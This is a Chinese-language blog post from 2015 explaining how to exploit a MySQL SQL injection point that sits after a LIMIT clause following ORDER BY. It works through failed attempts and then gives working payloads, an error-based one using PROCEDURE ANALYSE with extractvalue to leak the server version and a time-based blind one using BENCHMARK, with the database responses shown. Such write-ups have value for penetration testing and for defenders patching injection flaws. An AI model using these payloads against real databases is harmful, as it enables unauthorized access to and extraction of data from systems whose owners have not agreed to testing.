Mysql注入點在limit關鍵字後面的利用方法

edithfang發表於2015-01-28
細節

在一次測試中,我碰到了一個sql注入的問題,在網上沒有搜到解決辦法,當時的注入點是在limit關鍵字後面,資料庫是MySQL5.x,SQL語句類似下面這樣:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入點】

問題的關鍵在於,語句中有order by 關鍵字,我們知道,mysql 中在order by 前面可以使用union 關鍵字,所以如果注入點前面沒有order by 關鍵字,就可以順利的使用union 關鍵字,但是現在的情況是,注入點前面有order by 關鍵字,這個問題在stackoverflow 上和sla.ckers上都有討論,但是都沒有什麼有效的解決辦法。

我們先看看 mysql 5.x 的文件中的 select 的語法:

SELECT 
[ALL | DISTINCT | DISTINCTROW ]  
[HIGH_PRIORITY]  
[STRAIGHT_JOIN]  
[SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]  
[SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]  
select_expr [, select_expr ...]  
[FROM table_references  
[WHERE where_condition]  
[GROUP BY {col_name | expr | position}  
[ASC | DESC], ... [WITH ROLLUP]]  
[HAVING where_condition]  
[ORDER BY {col_name | expr | position}  
[ASC | DESC], ...]  
[LIMIT {[offset,] row_count | row_count OFFSET offset}]  
[PROCEDURE procedure_name(argument_list)]  
[INTO OUTFILE 'file_name' export_options  
| INTO DUMPFILE 'file_name' 
| INTO var_name [, var_name]]  
[FOR UPDATE | LOCK IN SHARE MODE]]  
limit 關鍵字後面還有 PROCEDURE 和 INTO 關鍵字,into 關鍵字可以用來寫檔案,但這在本文中不重要,這裡的重點是 PROCEDURE 關鍵字.MySQL預設可用的儲存過程只有 ANALYSE (doc)。
嘗試用這個儲存過程:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);  
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

ANALYSE支援兩個引數,試試兩個引數:

mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);  
ERROR 1386 (HY000): Can't use ORDER clause with this procedure

依然無效,嘗試在 ANALYSE 中插入 sql 語句:

mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);  

響應如下:

ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ 

事實證明,sleep 沒有被執行,最終,我嘗試瞭如下payload :

mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);  
ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1'

啊哈,上面的方法就是常見的報錯注入,所以,如果注入點支援報錯,那所有問題都ok,但是如果注入點不是報錯的,還可以使用 time-based 的注入,payload 如下:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)  

有意思的是,這裡不能用sleep而只能用 BENCHMARK。

另外,這裡還有一種類似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30
評論(2)

相關文章